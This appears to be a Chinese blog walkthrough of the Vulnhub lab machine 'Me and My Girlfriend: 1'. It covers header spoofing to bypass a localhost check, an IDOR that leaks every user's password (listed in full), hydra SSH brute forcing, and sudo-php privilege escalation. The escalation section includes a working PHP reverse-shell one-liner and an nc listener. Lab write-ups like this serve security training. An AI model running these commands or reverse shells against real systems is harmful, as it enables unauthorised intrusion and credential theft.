Vulnhub靶机:ME AND MY GIRLFRIEND_ 1

已于 2022-02-02 15:16:25 修改
阅读量1.6k 收藏 2
点赞数
分类专栏: 靶机 文章标签: Vulnhub
于 2022-01-29 14:37:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122743300
版权

目录

介绍

系列:Me and My Girlfriend(此系列仅此一台)
发布日期: 2019年12月13日
难度: 初级
Flag : 2个
学习:BurpSuite在水平越权中的应用、SUID提权
靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

信息收集

主机发现

nmap -sn 192.168.40.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.40.147,开放了22、80端口。
在这里插入图片描述

网站探测

提示我们只能本地访问这个站点
在这里插入图片描述

解决办法1:使用插件 X-Forwarded-For Header
刷新网页,会进入到下图中的网站
在这里插入图片描述

解决办法2:使用BurpSuite
让每一个流经bp的流量,都添加请求头:X-Forwarded-For: localhost
在这里插入图片描述

我这里出了点bug,明明已经移除了插件 X-Forwarded-For Header,并且清空浏览器缓存了,bp抓包中不仅出现了插件中的“X-Forwarded-For: 127.0.0.1”,还出现了bp的“X-Forwarded-For: localhost”,既然如此,我就手动移除刚才设置的bp请求头好了。
在这里插入图片描述

打开的网站如下,发现可以注册账号,注册之后的url地址有点引人注目
在这里插入图片描述

sql注入-失败

没有单引号报错
在这里插入图片描述

额,还是寄出sqlmap试试吧

python .\sqlmap.py -u "http://192.168.40.147/index.php?page=profile&user_id=12" -p user_id --headers "X-Forwarded-For: 127.0.0.1"

没有测试出来什么东西。
在这里插入图片描述

水平越权-成功

测试修改id值,页面的内容也发生了变化。这个靶场,还真是简单,剩下的八成就是测试出所有的账号密码,然后ssh爆破了。
在这里插入图片描述

获取到所有账号密码

直接使用bp爆破,不过需要添加一个过滤器,筛选一下结果。分别筛选出用户名和密码
在这里插入图片描述

在这里插入图片描述

开始爆破,并导出结果
在这里插入图片描述

得到:

用户名密码
eweuhtandinganskuyatuh
aingmaungqwerty!!!
sundateaindONEsia
sedihaingmahcedihhihihi
alice4lic3
abdikasepakdorrrrr
superman123456

SSH爆破

由于用户名和密码是对应好的关系,因此hydra中可以使用-C参数来爆破比较好。
在这里插入图片描述

SSH登录

Flag1

倒数第三行,得到提示,需要提权得到root家目录里面的另一个flag
在这里插入图片描述

提权拿到Flag2

寻找sudo权限,我发现Alice可以在没有root密码的情况下使用sudo运行php命令。我一般是使用php反弹shell,这里发现老外用的是别的方法,顺带着介绍一下。

方法1:php命令执行

我创建了一个变量并添加了 shell 名称 /bin/bash,我们的下一步是使用 sudo /usr/bin/php/php 执行变量命令。
在这里插入图片描述

方法2:php反弹shell

kali开启nc监听
nc -lnvp 4444

靶机反弹shell
sudo php -r '$sock=fsockopen("192.168.40.129",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

在这里插入图片描述
在这里插入图片描述

参考

Me and My Girlfriend: 1 vulnhub walkthrough

lainwith
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
[Vulnhub] Me and my girlfriend
weixin_63231007的博客
06-27 421
目录前言信息收集越权访问ssh爆破提权打算学习一下渗透测试,配合vulnhub来学习一下。靶机下载链接:Me and My Girlfriend: 1 ~ VulnHubkali和靶机都设置为NAT模式,这样他们就在同一网段然后打开kali和我们的靶机由于靶机和kali在同一网段,打开kali,通过nmap进行主机发现kali:192.168.236.128 靶机ip应该就是:192.168.236.130 开放了22(ssh)和80(http)端口,应该是个网站服务器访问192.168.236.130:8
Vulnhub靶场之Me-and-My-Girlfriend
weixin_51446936的博客
06-10 661
先看一下描述: 一、靶机搭建 1. 靶机下载 下载地址:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2. 靶机导入 第一步:导入(打开虚拟机–>选择下载的靶机–>选择存储路径–>导入) 注:会报导入失败的错误,点击重试即可。 第二步:导入后,删除网卡并重新添加(NAT网卡) 第三步:启动虚拟机 二、信息收集 1. nmap扫描确定靶机ip nmap -sS -Pn 192.168.
VulnHub靶场-Me and My Girlfriend: 1
最新发布
weixin_48972359的博客
04-16 893
靶机:ME AND MY GIRLFRIEND: 1靶机需求:靶机里有2个flag,我们的目标就是找出这2个flag。
Vulnhub靶机渗透之Me and My Girlfriend
realmels的博客
06-28 2079
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell 介绍 Vulnhub它是一个提供各种漏洞环境的平台,官方链接:https://www.vuln.
Vulnhub-Me and My Girlfriend: 1-Writeup
Vicl1fe的博客
12-18 938
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 靶机知识点: kali ip:192.168.34.80 靶机ip:192.168.34.152 信息收集 常规收集。 nmap -sV -p- 192.168.34.152 妥妥的...
Vulnhub】me-and-mygrilfriend_Writeup
4ut15m's blog
12-18 683
Vulnhub_Me-And-MyGirlFriend_WriteUP@4ut15m Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked...
靶机系列测试 Me and My Girlfriend 11
08-03
介绍2.1 靶机介绍描述说明there are 2 flag filesWeb Application | Enumeration | Privilege Es
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
qq_57976347的博客
01-26 3879
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动 一、靶场环境搭建 Me-and-My-Girlfriend-1的靶机网络模式设置为NAT 接着启动该靶场虚拟机 二、在Kali上面的操作 1.用nmap命令探测靶机的IP 用 nmap -sV -n -open -p- 192.168.100.128 扫出靶机详细信息 2.登录靶机的..
VulnHub实战篇六:Me And My Girlfriend靶机渗透记录
a1004070060的博客
04-23 1145
0x00靶机信息 下载地址:下载地址 攻击机ip:172.16.12.137 靶机ip:172.16.12.141 目标:getshell,获取两个flag,并提权至root 0x01过程 首先识别一下目标开启的端口和服务,可以看到目标开启了ssh(22)和http(80)服务。 访问一下web站点,提示只能从本地登录,否则会被当作hacker拦截。 抓包修改请求头,添加x...
Vulnhub Me-and-My-Girlfriend 1靶机思路分析
Sum
06-13 1677
Vulnhub Me-and-My-Girlfriend 1靶机思路分析 背景描述:有一对恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“ Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限! Me-and-My-Girlfriend: 下载地址: https : //download.vulnhub.com 环境: Vmware 15 Pro虚拟机软件
靶机渗透之Me-and-My-Girlfriend
weixin_64267091的博客
12-20 1165
总结一下打靶过程:第一步:信息收集。主机发现和端口扫描,确定端口号基本上是80端口。然后进行漏洞扫描,没有扫出来有用的信息,最后就是目录扫描,扫出来一些有用的目录第二步:web渗透。打开扫描的目录,提示只允许本地登录,所以用BurpSuite改包在请求头添加x-forwarded-for:localhost绕过本地登录。
Vulnhub靶机之Me-and-My-Girlfriend-1
m0_52328368的博客
07-23 604
vulnhub靶场 Me-and-My-Girlfriend-1 详细操作过程
初试Vulnhub靶场之Me and My Girlfriend(上)
Mrs_H的博客
09-06 648
初试Vulnhub靶场之Me and My Girlfriend(上) 今天刚刚了解到一个靶场vulnhub,然后看了很多大佬的wp就想着自己写一个,刚刚好手头上有一个新下的靶机Me and My Girlfriend,稍稍把玩了一下,拿到了第一个flag,下面是我的方法 ...
VulnHub系列』Me and My Girlfriend: 1-Walkthrough
ins1ght的博客
12-20 1786
这是我完成的VulnHub上的第29个靶机。难度:初级,靶机发布日期:2019年12月13日。标签:水平越权漏洞、sudo权限php提权。
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值